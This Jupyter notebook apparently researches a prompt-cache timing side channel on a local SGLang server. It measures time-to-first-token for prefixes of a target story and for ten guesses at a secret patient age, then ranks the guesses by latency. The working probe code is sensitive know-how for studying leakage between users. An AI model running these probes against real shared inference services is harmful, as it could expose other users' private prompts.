In [1]:
import time
import requests
import json
import random
import string
from sglang.utils import print_highlight
import asyncio
import aiohttp
import numpy as np
from transformers import AutoTokenizer
from datasets import load_dataset
from collections import Counter
from tqdm import tqdm
import multiprocessing
import pandas as pd
from tqdm.asyncio import tqdm_asyncio

  from .autonotebook import tqdm as notebook_tqdm


#### offline

In [None]:
import json
import pandas as pd
from collections import Counter
from tqdm import tqdm
import multiprocessing
from datasets import load_dataset
from transformers import AutoTokenizer

# Resources for the offline token-frequency pass. The imports at the top of this
# cell repeat names that the notebook's first cell already imports.

# 1. Load the tokenizer and the dataset whose token frequencies are counted.
# NOTE(review): this cell loads the 1B-Instruct tokenizer while later cells load
# the 3B-Instruct one; presumably both share a vocabulary — confirm.
model_id = "meta-llama/Llama-3.2-1B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_id)
ds = load_dataset("HuggingFaceH4/ultrachat_200k", split="train_gen")

def extract_text(batch):
    """Flatten every conversation of a batch into one space-joined string.

    Args:
        batch: Mapping with a "messages" entry that holds one list of message
            dicts per example; each message dict must provide "content".

    Returns:
        A list with one string per conversation, in input order.
    """
    return [
        " ".join(turn["content"] for turn in conversation)
        for conversation in batch["messages"]
    ]

def count_tokens_in_batch(batch):
    """Count token-id occurrences over one batch of conversations.

    The conversations are flattened with ``extract_text`` and tokenized with the
    module-level ``tokenizer`` (no special tokens added). The tally is returned
    as a single JSON string, so a whole batch collapses into one output row.

    Args:
        batch: Batch mapping as accepted by ``extract_text``.

    Returns:
        ``{"json_counts": [<json string>]}`` where the JSON object maps each
        token id (as a string key, because JSON keys are strings) to its count.
    """
    id_sequences = tokenizer(extract_text(batch), add_special_tokens=False)["input_ids"]
    tally = Counter(token_id for sequence in id_sequences for token_id in sequence)
    return {"json_counts": [json.dumps(dict(tally))]}

print("Tokenizing and counting in parallel...")
# Each input batch of 1000 examples becomes one row holding a JSON tally; the
# dataset's original columns are dropped.
processed = ds.map(
    count_tokens_in_batch,
    batched=True,
    batch_size=1000,
    remove_columns=ds.column_names,
    num_proc=multiprocessing.cpu_count(),
)

print("Aggregating partial counts...")
total_counts = Counter()
for partial_row in tqdm(processed):
    # Keys come back from JSON as strings (e.g. "101"), so total_counts is keyed
    # by string token ids at this point.
    total_counts.update(json.loads(partial_row["json_counts"]))

total_tokens = sum(total_counts.values())

# --- Build the per-token frequency table ---

print("Filling in missing tokens (count=0)...")

# Observed counts, one row per token id. The ids arrive as strings because they
# went through JSON, so the index is cast back to integers.
observed_counts = pd.DataFrame.from_dict(total_counts, orient='index', columns=['count'])
observed_counts.index = observed_counts.index.astype(int)

# Reindex onto 0..vocab_size-1: ids never seen in the corpus get count 0, and
# ids outside that range are dropped.
all_token_ids = range(tokenizer.vocab_size)
df = observed_counts.reindex(all_token_ids, fill_value=0)

# Expose the id as an ordinary 'token_id' column.
df.index.name = 'token_id'
df = df.reset_index()

# Relative frequency per token; zero-count tokens get probability 0.0.
total_observed = df['count'].sum()
df['probability'] = df['count'] / total_observed

print(f"Final DataFrame shape: {df.shape} (Should match vocab size: {tokenizer.vocab_size})")

# Persist the unsmoothed table.
df.to_parquet("token_prob.parquet", engine="pyarrow", index=False)
print("Saved to token_prob.parquet (including zero-count tokens)")
# Add-one smoothing: every token id gets count + 1 so that no id ends up with
# probability 0, then the probabilities are renormalised and saved separately.
tokenprob = pd.read_parquet("token_prob.parquet")
tokenprob["count"] += 1
total = sum(tokenprob["count"].tolist())
tokenprob["probability"] = tokenprob["count"] / total
tokenprob.to_parquet("token_prob_norm.parquet")

In [2]:
# Local server port; also used by flush_cache to build its endpoint URL.
port=37168
# Chat-completions endpoint that the victim and probe requests are posted to.
URL = f"http://localhost:{port}/v1/chat/completions"

In [3]:
# Tokenizer used to decode sampled token ids and to split the target prompt.
tokenizer=AutoTokenizer.from_pretrained("meta-llama/Llama-3.2-3B-Instruct")
ds = load_dataset("HuggingFaceH4/ultrachat_200k",split="train_gen")
vocab=tokenizer.get_vocab()
# Smoothed token-frequency table written by the offline counting cell.
tokenprob=pd.read_parquet("token_prob_norm.parquet")
# Parallel arrays read by get_tokens: candidate ids and their sampling weights.
candidate_ids = tokenprob['token_id'].to_numpy()
probabilities = tokenprob['probability'].to_numpy()

In [4]:
def flush_cache():
    """Ask the local server to drop its cache before a timing trial.

    Sends a POST to ``/flush_cache`` on the module-level ``port``.

    Raises:
        requests.HTTPError: If the server answers with an error status. The
            timing trials assume a freshly flushed cache, so a refused flush
            must not pass unnoticed.
    """
    flushurl = f"http://localhost:{port}/flush_cache"
    response = requests.post(flushurl)
    # Fail loudly instead of measuring against a cache that was not flushed.
    response.raise_for_status()
    # print_highlight(response.text)

def get_tokens(n=1):
    """Sample ``n`` distinct token ids by frequency and return their text.

    Ids are drawn without replacement from the module-level ``candidate_ids``
    using ``probabilities`` as weights; each id is decoded on its own with the
    module-level ``tokenizer`` and stripped of surrounding whitespace.

    Args:
        n: Number of tokens to sample.

    Returns:
        A list of ``n`` decoded, stripped token strings.
    """
    sampled_ids = np.random.choice(candidate_ids, size=n, p=probabilities, replace=False)
    return [tokenizer.decode([token_id]).strip() for token_id in sampled_ids]

def victim(TARGET_PROMPT,URL,flush):
    """Play the victim: send the target prompt as one non-streaming request.

    Args:
        TARGET_PROMPT: Text sent as the single user message.
        URL: Chat-completions endpoint to post to.
        flush: When truthy, ``flush_cache()`` is called before the request.

    Returns:
        None. The server's response is discarded.
    """
    if flush:
        flush_cache()
    # NOTE(review): "session_id" and "max_new_tokens" are not standard OpenAI
    # chat-completion fields — confirm the server honours rather than ignores them.
    request_body = {
        "model": "default",
        "messages": [{"role": "user", "content": TARGET_PROMPT}],
        "temperature": 0,
        "session_id":0,
        "max_new_tokens":128
    }
    requests.post(URL, json=request_body)
    # print_highlight(response.json())

In [5]:
async def fetch_metrics_raw(session, prompt, request_id, URL):
    """Stream one chat completion and measure its latency.

    Args:
        session: Object whose ``post(URL, json=...)`` returns an async context
            manager yielding a response with ``status`` and an async-iterable
            ``content`` of byte lines (an ``aiohttp.ClientSession`` in this
            notebook).
        prompt: Text sent as the single user message.
        request_id: Caller-chosen identifier echoed back in the result.
        URL: Chat-completions endpoint to post to.

    Returns:
        For HTTP 200, a dict with "id", "prompt", "ttft_ms" (time from just
        before the request to the first non-empty content chunk), "tpot_ms"
        (mean time per chunk after the first), "tokens" (number of non-empty
        content chunks), "status" == "success" and "restext" (concatenated
        content). For any other status, ``{"id", "error", "status": "fail"}``.
    """
    # NOTE(review): "session_id" and "context_length" are not standard OpenAI
    # chat-completion fields — confirm the server honours them.
    request_body = {
        "model": "default", 
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id":0,
        "context_length":128
    }
    sse_prefix = "data: "
    started_at = time.perf_counter()
    first_chunk_at = None
    ttft = 0
    pieces = []
    async with session.post(URL, json=request_body) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for raw_line in response.content:
            text = raw_line.decode('utf-8').strip()
            # Only server-sent-event data lines carry payload.
            if not text.startswith(sse_prefix):
                continue
            body = text[len(sse_prefix):]
            if body == "[DONE]":
                break
            piece = json.loads(body)['choices'][0]['delta'].get('content', '')
            if not piece:
                continue
            pieces.append(piece)
            if first_chunk_at is None:
                first_chunk_at = time.perf_counter()
                ttft = first_chunk_at - started_at
        finished_at = time.perf_counter()
        chunk_total = len(pieces)
        # Per-chunk time is only defined once at least two chunks arrived.
        if chunk_total > 1 and first_chunk_at:
            tpot = (finished_at - first_chunk_at) / (chunk_total - 1)
        else:
            tpot = 0
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": chunk_total,
            "status": "success",
            "restext": "".join(pieces)
        }

async def main(attack_prompts, URL):
    """Send all prompts concurrently, print a timing table, and pick the fastest.

    Args:
        attack_prompts: Sequence of prompt strings; each becomes one request
            whose id is its position in the sequence.
        URL: Chat-completions endpoint handed to ``fetch_metrics_raw``.

    Returns:
        ``(best_request, successful_results)``. ``best_request`` is the
        successful result with the smallest "ttft_ms", or ``None`` when no
        request succeeded. ``successful_results`` holds every result whose
        "status" is "success".
    """
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = [
            fetch_metrics_raw(session, prompt, i, URL)
            for i, prompt in enumerate(attack_prompts)
        ]
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        # Defined up front so the return below cannot hit an unbound name when
        # every request failed (or no prompts were given).
        best_request = None
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])
            
            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [6]:
# target_tokens=[get_tokens(1)[0] for i in range(800)]
# Target prompt for the block-timing experiment: it is sent in full by victim()
# and split into cumulative 16-token prefixes that are then timed as probes.
# The text is runtime data — do not edit its wording.
target='''The ancient clock tower in the center of Eldoria had stopped ticking exactly one hundred years ago, at the precise moment the last King, Alaric the Just, had vanished. The hands were frozen at 11:59, a perpetual minute before midnight, a silent testament to a kingdom suspended in twilight.

For Elara, a young clockmaker with nimble fingers and a heart full of curiosity, the tower was an obsession. While others avoided its looming shadow, whispering tales of curses and ghosts, Elara saw a puzzle waiting to be solved. Her workshop, cluttered with gears, springs, and pendulums, was filled with sketches of the tower's intricate mechanism. She knew every cog, every lever, every escapement by heart, yet the reason for its paralysis remained elusive.

One crisp autumn morning, a stranger arrived in Eldoria. He was cloaked in gray, his face hidden beneath a hood, and he carried a staff of gnarled wood that seemed to hum with faint energy. He called himself Kaelen, a wanderer seeking lost knowledge. He found Elara in her workshop, examining a delicate balance wheel under a magnifying glass.

“The heart of the tower does not beat,” Kaelen said, his voice raspy like dry leaves. “Not because it is broken, but because it is waiting.”

Elara looked up, startled. “Waiting for what?”

“For the King’s return,” Kaelen replied. “Or for someone brave enough to take his place.”

Intrigued, Elara invited Kaelen to examine her blueprints. He pointed to a hidden chamber beneath the main mechanism, a detail she had missed in her years of study. “The Chronos Gem,” he explained. “A stone of immense power that regulated the flow of time within the kingdom. It was stolen the night the King disappeared.”

Elara’s eyes widened. She had heard legends of the Gem, dismissed as fairy tales. “Where is it now?”

Kaelen unrolled a faded map on her workbench. “In the Whispering Caverns, guarded by the Shadow Weaver. A creature of darkness that feeds on lost moments.”

Determined to restore the clock and perhaps uncover the fate of the lost King, Elara agreed to accompany Kaelen. They set off at dawn, leaving the silent town behind. The journey to the Whispering Caverns was arduous. They traversed dense forests where trees whispered secrets of the past, and crossed treacherous ravines bridged by precarious ropes. Along the way, Kaelen taught Elara about the magic woven into the fabric of Eldoria, a magic fading with the stagnation of time.

Finally, they reached the mouth of the caverns. The air was cold and damp, smelling of ozone and decay. Inside, shadows danced on the walls, twisting into grotesque shapes. Deeper they went, until they reached a vast underground lake. In the center, on a small island, pulsated a faint blue light—the Chronos Gem.

But guarding it was the Shadow Weaver, a monstrous spider-like entity composed of swirling darkness. Its many eyes glowed with malevolent intent. Kaelen raised his staff, casting a protective barrier of light, while Elara sprinted towards the island.

The Shadow Weaver lunged, its shadowy limbs slashing at Kaelen’s barrier. Elara reached the island, her hands trembling as she approached the Gem. It was warm to the touch, vibrating with a rhythmic pulse. She remembered Kaelen’s words: The tower is waiting.

She didn't just need to take the gem; she needed to synchronize it. Pulling a small, intricate pocket watch from her vest—her masterpiece—she placed it next to the Gem. She began to chant an ancient rhyme Kaelen had taught her, a spell of binding spell.
The Shadow Weaver shrieked.
'''

In [7]:
# Build 50 cumulative prefixes of the target in 16-token steps:
# blocks[k] is the text of the first 16*(k+1) target tokens. Once the prefix
# length exceeds the target's token count, the entry is simply the full text.
#
# add_special_tokens=False keeps the tokenizer from adding special tokens such
# as a leading BOS marker. decode() would otherwise render that marker as
# literal text at the start of every prefix (and shift each boundary by one
# token), so no prefix would be a true prefix of `target`.
target_tokens=tokenizer.encode(target, add_special_tokens=False)
blocks=[]
prev=""
for i in range(50):
    # Decode the whole prefix in one call instead of concatenating per-chunk
    # decodes: a character whose bytes straddle a chunk boundary then only
    # affects the tail of that one prefix rather than corrupting all later ones.
    # clean_up_tokenization_spaces=False keeps the decoded text verbatim.
    prev=tokenizer.decode(target_tokens[:(i+1)*16], clean_up_tokenization_spaces=False)
    blocks.append(prev)

In [None]:
# Timing sweep: for every cumulative prefix in `blocks`, run 30 trials. Each
# trial flushes the server cache, replays the full target as the victim, then
# streams the prefix as a probe and records TTFT / TPOT for it.
data=[]

with tqdm(range(len(blocks))) as pbar:
    for b in pbar:
        prompt=blocks[b]
        for i in range(30):
            # Reset the cache and let the victim repopulate it with the target.
            victim(target,URL, True)
            pbar.set_description_str("Flushed")
            payload = {
                "model": "default", 
                "messages": [{"role": "user", "content": prompt}],
                "stream": True,
                "temperature": 0,
                "session_id":0,
                "max_new_tokens":128
            }
            first_token_time = None
            token_count = 0
            ttft = 0
            restext=""
            start_time = time.perf_counter()
            # The context manager releases the streamed connection even when the
            # body is not read to the end (the loop breaks on "[DONE]").
            with requests.post(URL, json=payload,stream=True) as response:
                if response.status_code != 200:
                    # Report the dropped trial instead of skipping it silently.
                    pbar.write(f"Block {b}, Trial {i}: HTTP {response.status_code}, trial skipped")
                    continue
                for chunk in response.iter_lines(decode_unicode=False):
                    chunk = chunk.decode("utf-8")
                    if chunk and chunk.startswith("data:"):
                        if chunk == "data: [DONE]":
                            break
                        chunk = json.loads(chunk[5:].strip("\n"))
                        delta = chunk['choices'][0]['delta']
                        content = delta.get('content', '')
                        if content:
                            restext+=content
                            if first_token_time is None:
                                first_token_time = time.perf_counter()
                                ttft = first_token_time - start_time
                            token_count += 1
                end_time = time.perf_counter()
            # Per-chunk time is only defined once at least two chunks arrived.
            tpot = 0
            if token_count > 1 and first_token_time:
                generation_time = end_time - first_token_time
                tpot = generation_time / (token_count - 1)

            data.append({
                # Index into `blocks`, so rows can be grouped by prefix length
                # without re-deriving it from the prompt text.
                "block":b,
                "trial":i,
                "prompt": prompt,
                "ttft_ms": ttft * 1000 if ttft else 0,
                "tpot_ms": tpot * 1000,
                "tokens": token_count,
                "status": "success",
                "restext":restext
            })
            pbar.set_description_str(f"\tBlock {b}, Trial:{i}, TTFT:{ttft*1000}, TPOT:{tpot*1000}")

# NOTE: `df` rebinds the name used for the token-frequency table in the offline
# counting cell.
df=pd.DataFrame(data)
df.to_parquet("block_timing.parquet")

	Block 0, Trial:12, TTFT:82.57767697796226, TPOT:40.099939626668565:   0%|          | 0/50 [10:11<?, ?it/s]

#### online

In [None]:
# Local server port; also used by flush_cache to build its endpoint URL.
port=37168
# Chat-completions endpoint that the victim and probe requests are posted to.
URL = f"http://localhost:{port}/v1/chat/completions"

In [None]:
# Tokenizer used by get_tokens to decode sampled token ids.
tokenizer=AutoTokenizer.from_pretrained("meta-llama/Llama-3.2-3B-Instruct")
ds = load_dataset("HuggingFaceH4/ultrachat_200k",split="train_gen")
vocab=tokenizer.get_vocab()
# Smoothed token-frequency table written by the offline counting cell.
tokenprob=pd.read_parquet("token_prob_norm.parquet")
# Parallel arrays read by get_tokens: candidate ids and their sampling weights.
candidate_ids = tokenprob['token_id'].to_numpy()
probabilities = tokenprob['probability'].to_numpy()

In [None]:
def flush_cache():
    """Ask the local server to drop its cache and show its reply.

    Sends a POST to ``/flush_cache`` on the module-level ``port`` and prints the
    response text with ``print_highlight``.

    Raises:
        requests.HTTPError: If the server answers with an error status. The
            experiments assume a freshly flushed cache, so a refused flush must
            not pass unnoticed.
    """
    flushurl = f"http://localhost:{port}/flush_cache"
    response = requests.post(flushurl)
    print_highlight(response.text)
    # Fail loudly (after showing the server's message) instead of continuing
    # against a cache that was not flushed.
    response.raise_for_status()

def get_tokens(n=1):
    """Sample ``n`` distinct token ids by frequency and return their text.

    Ids are drawn without replacement from the module-level ``candidate_ids``
    using ``probabilities`` as weights; each id is decoded on its own with the
    module-level ``tokenizer`` and stripped of surrounding whitespace.

    Args:
        n: Number of tokens to sample.

    Returns:
        A list of ``n`` decoded, stripped token strings.
    """
    sampled_ids = np.random.choice(candidate_ids, size=n, p=probabilities, replace=False)
    return [tokenizer.decode([token_id]).strip() for token_id in sampled_ids]

In [None]:
async def fetch_metrics_raw(session, prompt, request_id, URL):
    """Stream one chat completion and measure its latency.

    Args:
        session: Object whose ``post(URL, json=...)`` returns an async context
            manager yielding a response with ``status`` and an async-iterable
            ``content`` of byte lines (an ``aiohttp.ClientSession`` in this
            notebook).
        prompt: Text sent as the single user message.
        request_id: Caller-chosen identifier echoed back in the result.
        URL: Chat-completions endpoint to post to.

    Returns:
        For HTTP 200, a dict with "id", "prompt", "ttft_ms" (time from just
        before the request to the first non-empty content chunk), "tpot_ms"
        (mean time per chunk after the first), "tokens" (number of non-empty
        content chunks), "status" == "success" and "restext" (concatenated
        content). For any other status, ``{"id", "error", "status": "fail"}``.
    """
    # NOTE(review): "session_id" and "context_length" are not standard OpenAI
    # chat-completion fields — confirm the server honours them.
    request_body = {
        "model": "default", 
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id":0,
        "context_length":128
    }
    sse_prefix = "data: "
    started_at = time.perf_counter()
    first_chunk_at = None
    ttft = 0
    pieces = []
    async with session.post(URL, json=request_body) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for raw_line in response.content:
            text = raw_line.decode('utf-8').strip()
            # Only server-sent-event data lines carry payload.
            if not text.startswith(sse_prefix):
                continue
            body = text[len(sse_prefix):]
            if body == "[DONE]":
                break
            piece = json.loads(body)['choices'][0]['delta'].get('content', '')
            if not piece:
                continue
            pieces.append(piece)
            if first_chunk_at is None:
                first_chunk_at = time.perf_counter()
                ttft = first_chunk_at - started_at
        finished_at = time.perf_counter()
        chunk_total = len(pieces)
        # Per-chunk time is only defined once at least two chunks arrived.
        if chunk_total > 1 and first_chunk_at:
            tpot = (finished_at - first_chunk_at) / (chunk_total - 1)
        else:
            tpot = 0
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": chunk_total,
            "status": "success",
            "restext": "".join(pieces)
        }

async def main(attack_prompts, URL):
    """Send all prompts concurrently, print a timing table, and pick the fastest.

    Args:
        attack_prompts: Sequence of prompt strings; each becomes one request
            whose id is its position in the sequence.
        URL: Chat-completions endpoint handed to ``fetch_metrics_raw``.

    Returns:
        ``(best_request, successful_results)``. ``best_request`` is the
        successful result with the smallest "ttft_ms", or ``None`` when no
        request succeeded. ``successful_results`` holds every result whose
        "status" is "success".
    """
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = [
            fetch_metrics_raw(session, prompt, i, URL)
            for i, prompt in enumerate(attack_prompts)
        ]
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        # Defined up front so the return below cannot hit an unbound name when
        # every request failed (or no prompts were given).
        best_request = None
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])
            
            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [None]:
def victim(TARGET_PROMPT,URL,flush):
    """Play the victim: send the target prompt and display the server's reply.

    Args:
        TARGET_PROMPT: Text sent as the single user message.
        URL: Chat-completions endpoint to post to.
        flush: When truthy, ``flush_cache()`` is called before the request.

    Returns:
        None. The decoded JSON response is shown via ``print_highlight``.
    """
    if flush:
        flush_cache()
    # NOTE(review): "session_id" is not a standard OpenAI chat-completion
    # field — confirm the server honours it.
    request_body = {
        "model": "default",
        "messages": [{"role": "user", "content": TARGET_PROMPT}],
        "temperature": 0,
        "session_id":0
    }
    reply = requests.post(URL, json=request_body)
    print_highlight(reply.json())

In [None]:
# Keep drawing batches of 50 sampled tokens until one contains the token "is".
prompts = get_tokens(50)
while "is" not in prompts:
    prompts = get_tokens(50)

In [None]:
# First call flushes the cache and sends the prompt containing the secret age
# digit; the second sends a variant with "%" in its place, without flushing.
victim("The patient's age is 5. Please consider age-related health considerations and risks.",URL,True)
victim("The patient's age is %. Please consider age-related health considerations and risks.",URL,False)


In [None]:
# One candidate prompt per digit 0-9, differing only in the age value.
conprompts=[f"The patient's age is {str(i)}. Please consider age-related health considerations and risks." for i in range(10)]
# Send all candidates concurrently; `best` is the result with the lowest TTFT
# and `suc` is the list of successful results (see main).
best,suc=await main(conprompts, URL)

In [None]:
# Tabulate the successful probe results, one row per request.
dfsuc=pd.DataFrame(suc)

In [None]:
# Display the results ordered by time-to-first-token, fastest first.
dfsuc.sort_values("ttft_ms")